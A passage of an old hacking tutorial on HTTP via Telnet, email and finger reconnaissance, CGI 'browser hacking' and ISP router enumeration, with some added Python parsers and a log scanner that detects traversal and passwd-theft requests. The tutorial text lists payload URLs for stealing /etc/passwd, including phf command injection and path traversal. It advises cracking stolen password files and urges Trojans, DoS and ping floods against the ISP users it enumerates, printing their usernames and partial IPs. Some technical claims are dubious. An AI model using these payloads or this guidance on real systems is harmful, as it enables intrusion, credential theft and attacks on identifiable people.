Now what will the URL be if you want to request the Yahoo homepage? Normally you write http://www.yahoo.com in the location bar to access Yahoo's homepage. Now if we remove the http:// and also the domain name (www.yahoo.com) then what is left? Nothing. This means the URL of the HTTP request is '/'. Hence the HTTP request now looks like:

get / HTTP/1.1

The third part of the HTTP request is pretty self explanatory. The HTTP/1.1 specifies the version of the HTTP service used by the browser. So say if a server is running HTTP/1.1 and a browser which is running HTTP/1.0 requests a page, then the server will send the page in terms of HTTP/1.0 only, removing the enhancements of HTTP/1.1.

So now that you know what a normal HTTP request sent by your browser looks like, let's find out how we can do this manually. This too requires Telnet. Now you know how important the Telnet client is in a Hacker's armoury. So launch your Telnet client and connect to Port 80 (as the HTTP daemon runs on Port 80) of any host. If the host you are trying to connect to does not have a website, i.e. does not have Port 80 open, then you would get an error message. If the connection is successful then the Title bar of your Telnet client will show the host address you are connected to and it will be ready for user input.

The HTTP daemon is not as boring as it seems to be till now. In fact it is very very interesting. Once telnet is ready for input just type h (or any other letter) and hit enter twice.

***********

Hacking Truth: After each HTTP command one has to press Enter Twice to send the command to the server or to bring about a response from a server. It is just how the HTTP protocol works.

**********

Now as 'h' or any other command that you typed is not a valid HTTP command, the server will give you an error message, something like the below:

HTTP/1.1 400 Bad Request

Server: Netscape-Enterprise/3.5.1

The server replies with the version of HTTP it is running (not so important), it gives us an error message and the error code associated with it (again not so important), but it also gives us the OS name and OS version it is running. Wow!!! It gives hackers who want to break into their server the ultimate piece of information which they require.

Anyway, now let's see what happens when we give a normal authentic request, requesting the main page of Yahoo. So after I telnet to Port 80 of www.yahoo.com I give the command:

get / http/1.1

(requesting for the Yahoo Homepage)

HTTP/1.0 200 OK

Content-Length: 12085

Content-Type: text/html

(No OS name, interesting. Well, Yahoo being a Top Web Company has configured their server to not display the OS name and version when an HTTP request is encountered.)


The get method gives the HTML source of the document requested. It seems just as if you are seeing the source by clicking View> Source.

Similarly you can see what happens when you issue the 'PUT' and 'HEAD' methods. Just replace 'GET' with the method that you want to use. For example,

head / http/1.1 and put / http/1.1

****************

Hacking Truth: Let's go back to the response that we got from the HTTP daemon once the HTTP Get method was okayed at Yahoo. The first line of the response was:

HTTP/1.0 200 OK

Now what does this 200 signify? Well, the '200' is called the status code. Whenever you give the server an HTTP command, it processes the command and accordingly displays a status code. A status code is a 3 digit code in the form of xxx. Status codes start from 1xx and go to 5xx. I am not sure what the 1xx series signifies as they are rarely used. The 2xx series signify successful completion of the HTTP command given. The 3xx series signify errors due to moving of documents. The 4xx series signify errors caused at the browser side and finally the 5xx series signify errors at the server side.

The most common status code that you come across, though you may never have actually seen it, is the 200 OK status code. Each time you are able to see a page in the browser successfully, the browser has been sent this status code by the HTTP daemon.

The most common error that you might come across and actually see would be the 404 Error: Not Found. This error message means that the URL that you are trying to access is not found; it has either been moved or has been deleted, or the linking of the web pages itself has not been done properly. You can go up one directory to look for the exact new changed URL.

***************
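The request format and the two responses quoted above, as an added example (not from the original manual): build_request assembles the request line plus headers exactly as they go down the wire, and parse_response splits a raw reply into status line, headers and body, classifies the status code by its first digit and flags a Server banner as the information leak the text points out. The two responses are constructed from the ones shown above; www.yahoo.com and example.invalid appear only as sample Host values.

```python
from typing import Dict, List, Tuple

def build_request(method: str, path: str, host: str, version: str = "HTTP/1.1") -> bytes:
    """Assemble the raw request line and headers exactly as they go down the wire.

    Method tokens are case-sensitive in the RFC ("GET", not "get"; some old servers
    tolerate lowercase). HTTP/1.1 additionally requires a Host header, which the
    hand-typed request in the text omits. Whatever the method, the side that opens
    the connection and sends this request is the client. The blank line at the end
    is the "press Enter twice" the Hacking Truth describes.
    """
    if not path.startswith("/"):
        raise ValueError("request-target must start with '/'")
    lines = [f"{method.upper()} {path} {version}"]
    if version == "HTTP/1.1":
        lines.append(f"Host: {host}")
    lines.append("Connection: close")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")

def parse_response(raw: bytes) -> Tuple[str, int, str, Dict[str, str], bytes]:
    """Split a raw response into (version, status code, reason, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError(f"malformed status line: {status_line!r}")
    version, code = parts[0], int(parts[1])
    reason = parts[2] if len(parts) == 3 else ""
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    return version, code, reason, headers, body

STATUS_CLASSES = {
    1: "informational",
    2: "success",
    3: "redirection (document moved)",
    4: "client-side error",
    5: "server-side error",
}

def status_class(code: int) -> str:
    """Classify a status code by its first digit, as the text lays out the xxx series."""
    return STATUS_CLASSES.get(code // 100, "unknown")

def banner_leak(headers: Dict[str, str]) -> List[str]:
    """Headers that reveal the server software and version; a hardened server omits them."""
    return [f"{h}: {headers[h]}" for h in ("server", "x-powered-by") if h in headers]

# Constructed responses modelled on the two quoted in the text.
BAD_REQUEST = (b"HTTP/1.1 400 Bad Request\r\n"
               b"Server: Netscape-Enterprise/3.5.1\r\n"
               b"Content-Type: text/html\r\n\r\n<html>Bad Request</html>")
OK_RESPONSE = (b"HTTP/1.0 200 OK\r\n"
               b"Content-Length: 12085\r\n"
               b"Content-Type: text/html\r\n\r\n<html><head><title>Yahoo!</title>...")

def describe(raw: bytes) -> str:
    """One-line verdict: status class plus whether a software banner leaked."""
    version, code, reason, headers, _ = parse_response(raw)
    leak = banner_leak(headers)
    note = "; leaks " + ", ".join(leak) if leak else "; no software banner"
    return f"{version} {code} {reason}: {status_class(code)}{note}"

if __name__ == "__main__":
    print(build_request("get", "/", "www.yahoo.com").decode())
    for r in (BAD_REQUEST, OK_RESPONSE):
        print(describe(r))
```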

An email address is pretty much all you need to find out more about a person. Let's see how one can gather more information by just knowing the email address. Let's take my email address for example,

ankit@bol.net.in

Now normally the string after the '@' sign is the domain name of the ISP with which the user is registered. Hence the server of my ISP where you can find info on me would become bol.net.in. So you do a Port scan on bol.net.in but get the error message, Host Not Found.

Sometimes the string after the '@' sign is not the domain name. Yes, the server exists, but it is probably behind a firewall and normal users do not have access to it from an untrusted external network. So you now examine the headers of an email sent by me. You see something like the following line in almost all emails sent by me, and the delhi1.mtnl.net.in part is always there.

Received: from bol.net.in by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13 Apr 2000 14:28:46

+0530 (IST)
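Reading a chain of Received headers, as an added example that is not the manual's code: each MTA prepends its own Received line, so walking them bottom-up gives the path a message took, which is what the text means by tracing a sender from the headers. The second Received header in SAMPLE_MESSAGE is modelled on the one quoted above; the mx.example.invalid hop is invented to show a second relay.

```python
import re
from email.parser import Parser

# Constructed sample message. The lower Received header is modelled on the real
# one quoted above; the upper one is invented to give the chain a second hop.
SAMPLE_MESSAGE = """\
Received: from delhi1.mtnl.net.in by mx.example.invalid (Postfix)
    id 4F2A1; Thu, 13 Apr 2000 14:31:02 +0530 (IST)
Received: from bol.net.in by delhi1.mtnl.net.in
    (8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13 Apr 2000 14:28:46
    +0530 (IST)
From: ankit@bol.net.in
Subject: hello

body text
"""

RECEIVED_RE = re.compile(
    r"from\s+(?P<from>\S+)"        # the host handing the message over
    r"(?:\s+\([^)]*\))?"           # optional "(helo/ip)" comment after it
    r".*?\bby\s+(?P<by>\S+)"       # the host that accepted it
    r".*?;\s*(?P<date>[^;]+)$",    # the timestamp after the last semicolon
)

def parse_received(value):
    """Turn one Received header value (folded or not) into {'from','by','date'}."""
    m = RECEIVED_RE.search(" ".join(value.split()))   # unfold: collapse all whitespace
    if not m:
        return None
    return {k: m.group(k).strip() for k in ("from", "by", "date")}

def relay_chain(raw):
    """Return the hops in delivery order, earliest first.

    Each MTA prepends its Received header, so the header nearest the body is the
    first hop; reversing the list puts the origin at index 0. Only hops added by
    servers you trust are reliable: anything earlier was written by machines the
    sender may control and can be forged.
    """
    msg = Parser().parsestr(raw)                      # compat32 keeps raw folded values
    hops = [parse_received(v) for v in msg.get_all("Received", [])]
    return [h for h in reversed(hops) if h]

def probable_origin(raw):
    """The 'from' host of the earliest hop, i.e. where the message entered the mail system."""
    chain = relay_chain(raw)
    return chain[0]["from"] if chain else None

if __name__ == "__main__":
    for hop in relay_chain(SAMPLE_MESSAGE):
        print(f"{hop['from']:22} -> {hop['by']:22} {hop['date']}")
```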

So you do a Port Scan on delhi1.mtnl.net.in. You find that the following Ports are open:

21 FTP

25 SMTP

79 Finger

80 HTTP

110 POP

and more...

The FTP daemon does not give much info on the users, so let's forget it and move on to the SMTP port. Almost all versions of Sendmail allow the 'vrfy' and the 'expn' commands. The 'vrfy' command verifies whether a particular email address is valid or not. The 'expn' command expands a particular email address. By that I mean that it provides additional information on the user owning the supplied email address.

For example, if we type the following while connected to Port 25, the server might respond with some interesting information on the user.

expn ankit@bol.net.in

For more details refer to the Sendmail Help.

The 'expn' and 'vrfy' commands are not bugs in Sendmail but features which were originally meant to do what they do now. Most ISPs have configured the Sendmail daemon such that it does not provide any info if it encounters these commands.

Port 79 is by default the Finger Port. Unix users might know Finger as a command which gives more information about any user on the Internet whose email address is known. Unix users can finger a user by simply typing:

finger email_address@domain_name.com

Windows users can use the DOS Telnet Client to telnet to Port 79.

C:\windows>telnet delhi1.mtnl.net.in 79

(My ISP has disabled the Finger Port so do not even try..)

No matter how you finger someone, you will either get an error message saying 'Access Denied' which means that the Finger Port is not open or you will be connected to the host with the Finger Daemon waiting for input. If you use a Windows Finger client (SamSpade I think so...) or Finger from Unix then the finger client automatically sends the user name which has to be fingered. But if you follow the Telnet method then when the Finger Daemon prompts for input, you will have to type the Username. For example,

ankit

The finger daemon would respond with something like the following (I have inserted comments after *):

[delhi1.mtnl.net.in] * My ISP

Login name: ankit In real life: Ankit Fadia * My Login Name and my real Name

Directory: /users/others/ankit Shell: /bin/ksh * The Directory where my .plan and other files are stored and my shell type

Last login Fri Dec 8 17:04 on ttyp0 from 202.xx.109.38 * My Last Login Info with last IP

No Plan. * Error message as there is no .plan file in my User directory i.e. users/others/ankit

When you register with your ISP, you provide them with some info (the form that you fill up??). Now a part of this info is always shown whenever someone fingers you. Additional information like the home address and residence number, office address, office telephone number etc. is shown or provided only if the .plan file exists. So what exactly is a .plan file?

Your home directory, which is set by the system administrator, contains some dot files which are automatically created when you configure mail clients and other services. It also contains this .plan file, which is not created automatically; the user has to create it himself. Sometimes your system administrator might create this file himself. Try to finger yourself and ensure that additional information about you is not displayed. If you find that fingering yourself gives out a lot of private information about you, then you should edit the .plan file or even delete it.

The finger daemon is rarely running on systems nowadays. Even if it is running, system administrators configure it to not display any information at all.

The Finger daemon not only unwittingly displays important info on the users but could also be used to get root. If you are really lucky and find an open Finger daemon then I suggest you try the following commands: finger root and finger system.

Say you do not even know the email address of a person. You only know the domain name he owns. Now you want to find out more about him, what do you do? WHOIS holds the key. It will return the email address of the owner of the domain name and then you can carry out the same normal process.

Hacking From your Web Browser

Nowadays, most websites use CGI scripts (or sometimes C scripts). Now these scripts are located in the /cgi-bin directory. What we want to do is to download these scripts for further examination or even use these scripts to steal passwords to access password protected parts of the website.

So simply put something like the below in the location bar of your browser to access the directory where the scripts are stored.

ftp://www.hostname.com/cgi-bin

ftp://www.hostname.com/../cgi-bin

http://www.hostname.com/cgi-bin

The ' ../ ' tells Unix systems to go up one directory. On some systems you should try '../../' instead.

The most common way to get the password file is to FTP anonymously and check if in the /etc directory access to the passwd (password file) is restricted or not. If it is not restricted then download the file and firstly unshadow it and then crack it.

Some systems have a file called PHF in the /cgi-bin directory which allows remote access to all files including the /etc/passwd file. The following is a list of URLs you can try to get the password file:

http://www.hostname.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

http://www.hostname.com/cgi-bin/php.cgi?/etc/passwd

http://www.hostname.com/~root

http://www.hostname.com/cgi-bin/test-cgi?* HTTP/1.0

http://www.hostname.com/cgi-bin/nph-test.cgi?* HTTP/1.0

http://www.hostname.com/samples/search/queryhit.html

http://www.hostname.com/samples/search/webhits.exe

http://www.hostname.com/_vti_pvt/service.pwd

http://www.hostname.com/secret/files/default.asp

ftp://www.hostname.com/etc/passwd

http://www.hostname.com/cgi-bin/htmlscript?../../../../etc/passwd

http://www.hostname.com/cgi-bin/view-source?../../../../../../../etc/passwd

What we want to do is to download the scripts and to examine them as to how they can be used to break the normal sequence. CGI Scripts can be used to Nuke the host and also to mail the password file to anyone we want.
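The same URL patterns seen from the server's side, as an added example that is not part of the manual: a scanner over a constructed access log that percent-decodes each request target and flags traversal, password-file and phf-style probes, so the hostmaster can see who tried what and whether the server answered 200. The log lines, hosts and timestamps are all invented; the request targets mirror the list above.

```python
import re
from urllib.parse import unquote

# Constructed sample access log in Common Log Format. The requests mirror the
# URL patterns listed in the text; client addresses and timestamps are invented.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2000:14:02:11 +0530] "GET /index.html HTTP/1.0" 200 2048
203.0.113.7 - - [10/Apr/2000:14:02:19 +0530] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 831
203.0.113.7 - - [10/Apr/2000:14:02:25 +0530] "GET /cgi-bin/htmlscript?../../../../etc/passwd HTTP/1.0" 404 312
203.0.113.7 - - [10/Apr/2000:14:02:31 +0530] "GET /_vti_pvt/service.pwd HTTP/1.0" 403 210
198.51.100.4 - - [10/Apr/2000:14:03:02 +0530] "GET /cgi-bin/view-source?..%2f..%2f..%2fetc%2fpasswd HTTP/1.0" 200 900
198.51.100.4 - - [10/Apr/2000:14:03:40 +0530] "POST /cgi-bin/guestbook.cgi HTTP/1.0" 200 120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Each rule: (name, predicate over the fully percent-decoded request target).
RULES = [
    ("path-traversal",   lambda t: "../" in t or "..\\" in t),
    ("passwd-fetch",     lambda t: "/etc/passwd" in t or "/etc/shadow" in t),
    ("phf-probe",        lambda t: t.lower().startswith("/cgi-bin/phf")),
    ("newline-in-query", lambda t: "\n" in t or "\r" in t),   # the %0a in the phf URL
    ("frontpage-pwd",    lambda t: "_vti_pvt/" in t and t.endswith(".pwd")),
]

def decode_target(target):
    """Percent-decode until stable so doubly encoded sequences (%252e) are caught too."""
    prev = None
    while prev != target:
        prev, target = target, unquote(target)
    return target

def classify(line):
    """Return (ip, target, status, [rule names]) for a log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m["target"])
    hits = [name for name, pred in RULES if pred(decoded)]
    return m["ip"], m["target"], int(m["status"]), hits

def scan(log_text):
    """Flag suspicious lines; a 200 on a flagged request is the one to investigate first."""
    findings = []
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[3]:
            ip, target, status, hits = parsed
            findings.append({"ip": ip, "target": target, "status": status,
                             "rules": hits, "likely_succeeded": status == 200})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "!!" if f["likely_succeeded"] else "  "
        print(f"{flag} {f['ip']:15} {f['status']} {','.join(f['rules']):36} {f['target']}")
```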

Post Dial Up Screen Hacking

The Post Dial Up Screen is the black terminal screen that comes up whenever you connect to a router, which asks for a Username and Password. After authentication, it prompts the user to enter the type of connection, i.e. PPP or SLIP. This process occurs whenever you dial into your ISP (assuming that you have enabled the option).

When most of you connect to the Internet, you do not have to go through this Post Dial Up Screen. This is because the 'Bring Up the Post Dial Up Screen' option is not enabled. To enable the Post Dial Up screen, simply follow these steps:

1. Launch Dial Up Networking

2. Right Click on Your Connection name and select properties.

3. Under the General Tab click on the Configure Button.

4. Click on the Options Tab and select, bring up the Dial Up Screen After dialing option.

5. Click OK

So now the next time you dial into your ISP, instead of directly verifying the Username and Password and connecting you, the Dial Up Connection will bring up a black window titled 'The Post DialUp Screen'. This screen symbolises the fact that we are now connected to the remote router of our ISP, where the process of authentication takes place. It will ask for the Username and Password and, once verified, we will get the prompt to specify the type of connection. The whole process would be something like:

User Access Verification

Username: ankit

Password:

delhinas4>

When this prompt comes (NOTE: instead of delhinas4 your ISP may have something else written), we need to specify the type of connection we want to establish: PPP or SLIP.

So typing PPP:

delhinas4>ppp

will result in my machine establishing a Point to Point Protocol (PPP) connection with my ISP.

But we are hackers and we surely do not want to learn how to establish a PPP connection. So let's move on to interesting stuff. Like almost all systems on the Internet, this router prompt too gives us help. So let's see what happens when I ask for help.

delhinas4>help

Help may be requested at any point in a command by entering a question mark '?'. If nothing matches, the help list will be empty and you must backup until entering a '?' shows the available options.

Two styles of help are provided:

1. Full help is available when you are ready to enter a command argument (e.g. 'show ?') and describes each possible argument.

2. Partial help is provided when an abbreviated argument is entered and you want to know what arguments match the input (e.g. 'show pr?'.)

So let me try typing simply, '?'.

delhinas4>?

Exec commands:

access-enable Create a temporary Access-List entry

access-profile Apply user-profile to interface

clear Reset functions

connect Open a terminal connection

disable Turn off privileged commands

disconnect Disconnect an existing network connection

enable Turn on privileged commands

exit Exit from the EXEC

help Description of the interactive help system

lock Lock the terminal

login Log in as a particular user

logout Exit from the EXEC

mrinfo Request neighbor and version information from a multicast router

mstat Show statistics after multiple multicast traceroutes

mtrace Trace reverse multicast path from destination to source

name-connection Name an existing network connection

pad Open a X.29 PAD connection

ping Send echo messages

ppp Start IETF Point-to-Point Protocol (PPP)

resume Resume an active network connection

rlogin Open an rlogin connection

show Show running system information

slip Start Serial-line IP (SLIP)

systat Display information about terminal lines

telnet Open a telnet connection

terminal Set terminal line parameters

traceroute Trace route to destination

tunnel Open a tunnel connection

where List active connections

x28 Become an X.28 PAD

x3 Set X.3 parameters on PAD

Wow!!! I got a whole list of allowed commands and also a single line description of each command. The router that we are connected to provides help on specific commands too. Anyway, let's try some kewl commands which reveal some very very useful info. I have inserted comments, wherever needed. The commands I type begin with the delhinas4> prompt.

delhinas4>mrinfo

% Timed out receiving response

[Editor: Well the mrinfo command is supposed to get info from routers, but unfortunately it always times out when I try it on my ISP, so let's try giving the famous systat command.]

delhinas4>systat

Line User Host(s) Idle Location

3 tty 3 tkdutta Async interface 00:00:05

4 tty 4 mmanoj Async interface 00:01:13

6 tty 6 mpshukla Async interface 00:04:38

10 tty 10 chawlaep Async interface 00:00:01

14 tty 14 techshar Async interface 00:00:00

15 tty 15 dscl Async interface 00:00:34

17 tty 17 utility Async interface 00:00:28

19 tty 19 saraswti Async interface 00:00:07

25 tty 25 affvvdel Async interface 00:12:48

26 tty 26 sanjiv3 Async interface 00:00:00

27 tty 27 vvs Async interface 00:00:00

28 tty 28 herz1313 Async interface 00:00:00

31 tty 31 neccinfo Async interface 00:00:01

32 tty 32 gmmm Async interface 00:00:07

35 tty 35 cebw Async interface 00:00:00

37 tty 37 delhinet Async interface 00:00:00

40 tty 40 digdelhi Async interface 00:01:14

47 tty 47 giansu Async interface 00:00:06

50 tty 50 tafazal Async interface 00:00:01

51 tty 51 translnk Async interface 00:00:02

52 tty 52 procurez Async interface 00:05:14

53 tty 53 triden Async interface 00:00:05


56 tty 56 prerna Async interface 00:00:00

58 tty 58 saroj Async interface 00:03:18

* 61 tty 61 ankit idle 00:00:01

68 tty 68 veekay Async interface 00:00:24

70 tty 70 kachi Async interface 00:00:01

74 tty 74 aqmohan Async interface 00:00:07

78 tty 78 mmdutta Async interface 00:00:00

81 tty 81 ks1assoc Async interface 00:00:00

87 tty 87 adinfo Async interface 00:00:35

88 tty 88 anni Async interface 00:00:00

89 tty 89 drrajive Async interface 00:00:04

107 tty 107 orienapp Async interface 00:00:34

109 tty 109 hmsdir Async interface 00:00:01

110 tty 110 anandpro Async interface 00:00:01

112 tty 112 guptalam Async interface 00:00:12

113 tty 113 airtalks Async interface 00:00:02

115 tty 115 yatish Async interface 00:00:27

117 tty 117 ttlnet4 Async interface 00:00:05

118 tty 118 dgmodlxr Async interface 00:00:00

120 tty 120 cdacd Async interface 00:00:00

The systat command gives us a list of currently logged on users. From the output, I now know their Usernames (and email addresses, obviously) and the time for which they have been online. But this info is not that useful, so let's try out the 'who' command. Note the '*' preceding the Username with which I have logged into this router.


delhinas5>who

Line User Host(s) Idle Location

14 tty 14 jbagga Async interface 00:00:00 PPP: 203.xx.248.119

15 tty 15 ptat Async interface 00:03:33 PPP: 203.xx.248.151

16 tty 16 dlgrp Async interface 00:00:00 PPP: 203.xx.248.70

19 tty 19 viprirag Async interface 00:00:02 PPP: 203.xx.248.2

22 tty 22 uaedcnd Async interface 00:00:00 PPP: 203.xx.248.147

28 tty 28 entasis Async interface 00:00:34 PPP: 203.xx.248.140

29 tty 29 ehircrc Async interface 00:00:00 PPP: 203.xx.248.137

34 tty 34 najiaero Async interface 00:10:07 PPP: 203.xx.248.221

37 tty 37 amritp Async interface 00:00:40 PPP: 203.xx.248.50

39 tty 39 bagris Async interface 00:00:00 PPP: 203.xx.248.143

40 tty 40 manish11 Async interface 00:00:00 PPP: 203.xx.248.233

42 tty 42 sunilg Async interface 00:00:00 PPP: 203.xx.248.76

48 tty 48 dreamtec Async interface 00:00:20 PPP: 203.xx.248.5

50 tty 50 iii111 Async interface 00:00:01 PPP: 203.xx.248.187

53 tty 53 azure Async interface 00:00:00 PPP: 203.xx.248.186

55 tty 55 gsubbn Async interface 00:00:00 PPP: 203.xx.248.83

62 tty 62 tubetool Async interface 00:01:33 PPP: 203.xx.248.169

64 tty 64 neratele Async interface 00:01:10 PPP: 203.xx.248.124

65 tty 65 grecy Async interface 00:00:00 PPP: 203.xx.248.208

68 tty 68 ians Async interface 00:00:55 PPP: 203.xx.248.194

70 tty 70 prabal Async interface 00:00:06 PPP: 203.xx.248.1

71 tty 71 kwkicd Async interface 00:00:08 PPP: 203.xx.248.155


73 tty 73 seco1 Async interface 00:00:01 PPP: 203.xx.248.230

74 tty 74 neelamm Async interface 00:00:00 PPP: 203.xx.248.32

75 tty 75 ukiran Async interface 00:00:07 PPP: 203.xx.248.53

76 tty 76 anandtsg Async interface 00:00:55 PPP: 203.xx.248.160

85 tty 85 avntin Async interface 00:06:14 PPP: 203.xx.248.126

87 tty 87 pnddelhi Async interface 00:00:00 PPP: 203.xx.248.144

88 tty 88 spph Async interface 00:00:02 PPP: 203.xx.248.108

* 89 tty 89 ankit idle 00:00:00

92 tty 92 krsawhny Async interface 00:00:14 PPP: 203.xx.248.192

94 tty 94 kashyaps Async interface 00:00:13 PPP: 203.xx.248.117

95 tty 95 slalklal Async interface 00:00:00 PPP: 203.xx.248.146

100 tty 100 computer Async interface 00:00:04 PPP: 203.xx.248.228

101 tty 101 kanchan1 Async interface 00:00:25 PPP: 203.xx.248.178

102 tty 102 kanhya Async interface 00:00:38 PPP: 203.xx.248.99

103 tty 103 dsidc Async interface 00:00:00 PPP: 203.xx.248.225

104 tty 104 nsl Async interface 00:00:00 PPP: 203.xx.248.152

106 tty 106 iconint Async interface 00:00:00 PPP: 203.xx.248.222

113 tty 113 atri Async interface 00:00:00 PPP: 203.xx.248.85

117 tty 117 striker Async interface 00:00:00 PPP: 203.xx.248.30

118 tty 118 coin Async interface 00:01:01 PPP: 203.xx.248.231

120 tty 120 snwadhwa Async interface 00:00:00 PPP: 203.xx.248.66

123 tty 123 prithvib Async interface 00:00:00 PPP: 203.xx.248.67


124 tty 124 itssupp Async interface 00:00:02 PPP: 203.xx.248.93

125 tty 125 jukebox Async interface 00:03:45 PPP: 203.xx.248.44

129 tty 129 pwhelan Async interface 00:00:04 PPP: 203.xx.248.106

134 tty 134 kapil1 Async interface 00:00:02 PPP: 203.xx.248.215

142 tty 142 infoplex Async interface 00:00:03 PPP: 203.xx.248.159

143 tty 143 tanya74 Async interface 00:00:00 PPP: 203.xx.248.88

150 tty 150 kapuras Async interface 00:00:33 PPP: 203.xx.248.65

154 tty 154 mpliwal Async interface 00:00:46 PPP: 203.xx.248.94

155 tty 155 aatishi Async interface 00:00:00 PPP: 203.xx.248.179

156 tty 156 gcdmrc Async interface 00:00:00 PPP: 203.xx.248.205

164 tty 164 mland Async interface 00:00:00 PPP: 203.xx.248.61

168 tty 168 creation Async interface 00:03:10 PPP: 203.xx.248.55

169 tty 169 dgupta Async interface 00:00:02 PPP: 203.xx.248.29

173 tty 173 skylink Async interface 00:00:04 PPP: 203.xx.248.120

175 tty 175 rsystems Async interface 00:00:01 PPP: 203.xx.248.75

183 tty 183 hmpl Async interface 00:00:00 PPP: 203.xx.248.19

185 tty 185 dartinc Async interface 00:00:13 PPP: 203.xx.248.114

187 tty 187 rajive Async interface 00:00:02 PPP: 203.xx.248.204

189 tty 189 clinepi Async interface 00:00:46 PPP: 203.xx.248.72

191 tty 191 sammy Async interface 01:01:00 PPP: 203.xx.248.42

192 tty 192 atrish Async interface 00:01:47 PPP: 203.xx.248.176

202 tty 202 skylink Async interface 00:00:12 PPP: 203.xx.248.118


207 tty 207 recom Async interface 00:00:01 PPP: 203.xx.248.35

211 tty 211 pusapoly Async interface 00:01:52 PPP: 203.xx.248.91

212 tty 212 rkglobal Async interface 00:00:57 PPP: 203.xx.248.36

219 tty 219 arajan Async interface 00:00:03

221 tty 221 sudhanju Async interface 00:00:00 PPP: 203.xx.248.102

225 tty 225 kkapahi Async interface 00:00:03 PPP: 203.xx.248.142

226 tty 226 lbsbra Async interface 00:00:00 PPP: 203.xx.248.183

227 tty 227 humra1k Async interface 00:00:01 PPP: 203.xx.248.64

239 tty 239 adcr Async interface 00:00:08 PPP: 203.xx.248.52

Vi2 exhibind Virtual PPP (Bundle) 00:00:27

Vi3 genpr Virtual PPP (Bundle) 00:09:14

Vi4 netcafe Virtual PPP (Bundle) 00:00:00

Vi6 bcddel Virtual PPP (Bundle) 00:00:00

Se6:4 cbidelzo Sync PPP 00:00:00

Se6:5 websityg Sync PPP 00:00:00

Se6:7 genpr Sync PPP -

Se6:11 bcddel Sync PPP -

Se6:12 exhibind Sync PPP -

Se6:14 samair Sync PPP 00:00:03

Se6:19 gosind Sync PPP 00:00:01

Se6:26 netcafe Sync PPP -

Interface User Mode Idle Peer Address

Now, what was that? Well not only did the 'who' command display the Usernames and the time online, but it also displayed the IP's of all people online. Now all you need to do is send a Trojan or something and start controlling the victim's computer. Or maybe try some DOS attacks or even start ping flooding the victim.

One may also send the disconnect string to the victim's modem to disconnect him or maybe even Hijack his connection. We will learn about this in a later issue.

Usually the systat and the 'who' commands display the same results, but on my ISP they gave different results. Another valuable command is the 'show' command, which when used with the 'version' parameter displays the version of the OS running on the remote router. In this case I find that my ISP has Cisco routers running Cisco IOS. Now any hacker can easily look for a hole in this particular version of the OS running on the router and get root privileges.

delhinas4>show version

Cisco Internetwork Operating System Software

IOS (tm) 5300 Software (C5300-I-M), Version 11.3(9)T, RELEASE SOFTWARE (fc1)

Copyright (c) 1986-1999 by cisco Systems, Inc.

Compiled Thu 08-Apr-99 10:54 by pwade

Image text-base: 0x60008920, data-base: 0x60550000

ROM: System Bootstrap, Version 11.2(9)XA, RELEASE SOFTWARE (fc2)

BOOTFLASH: 5300 Software (C5300-D-M), Version 11.3(9.2)T, MAINTENANCE INTERIM SOFTWARE

delhinas4 uptime is 7 weeks, 1 day, 7 hours, 52 minutes

System restarted by power-on

System image file is "flash:c5300-i-mz_113-9_T.bin", booted via flash

cisco AS5300 (R4K) processor (revision A.32) with 32768K/16384K bytes of memory.

Processor board ID 11494401

R4700 processor, Implementation 33, Revision 1.0 (512KB Level 2 Cache)

Channelized E1, Version 1.0.

Bridging software.

X.25 software, Version 3.0.0.

Primary Rate ISDN software, Version 1.1.

Backplane revision 2

Manufacture Cookie Info:

EEPROM Type 0x0001, EEPROM Version 0x01, Board ID 0x30,

Board Hardware Version 1.64, Item Number 800-2544-2,

Board Revision B0, Serial Number 11494401,

PLD/ISP Version 0.0, Manufacture Date 8-Dec-1998.

1 Ethernet/IEEE 802.3 interface(s)

1 FastEthernet/IEEE 802.3 interface(s)

31 Serial network interface(s)

120 terminal line(s)

4 Channelized E1/PRI port(s)

128K bytes of non-volatile configuration memory.

8192K bytes of processor board System flash (Read/Write)

4096K bytes of processor board Boot flash (Read/Write)

Configuration register is 0x2102
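The version banner above is exactly what an administrator should be feeding into an asset inventory, so that an old IOS release is noticed by its owner before anyone else notices it. The parser below is an added example, not code from the manual or from Cisco: it pulls the feature set, version, platform, hostname, uptime, image name and configuration register out of SAMPLE_SHOW_VERSION (a trimmed copy of the output above) and compares the version against MIN_VERSION, which is a made-up policy floor for this example and not a figure from any advisory.

```python
"""Turn Cisco IOS 'show version' output into an inventory record.

Added example for this section, not code from the manual or from Cisco. The
sample text is trimmed from the transcript above; MIN_VERSION is a made-up
policy floor, not a value from any advisory.
"""
import re

# Trimmed from the 'show version' output above; the values are as printed there.
SAMPLE_SHOW_VERSION = """\
Cisco Internetwork Operating System Software
IOS (tm) 5300 Software (C5300-I-M), Version 11.3(9)T, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1999 by cisco Systems, Inc.
ROM: System Bootstrap, Version 11.2(9)XA, RELEASE SOFTWARE (fc2)
delhinas4 uptime is 7 weeks, 1 day, 7 hours, 52 minutes
System restarted by power-on
System image file is "flash:c5300-i-mz_113-9_T.bin", booted via flash
cisco AS5300 (R4K) processor (revision A.32) with 32768K/16384K bytes of memory.
Configuration register is 0x2102
"""

VERSION_LINE_RE = re.compile(r"^IOS .*\((?P<feature_set>[^)]+)\), Version (?P<version>[^,]+),", re.M)
PLATFORM_RE = re.compile(r"^cisco (?P<platform>\S+) \((?P<cpu>[^)]+)\) processor", re.M)
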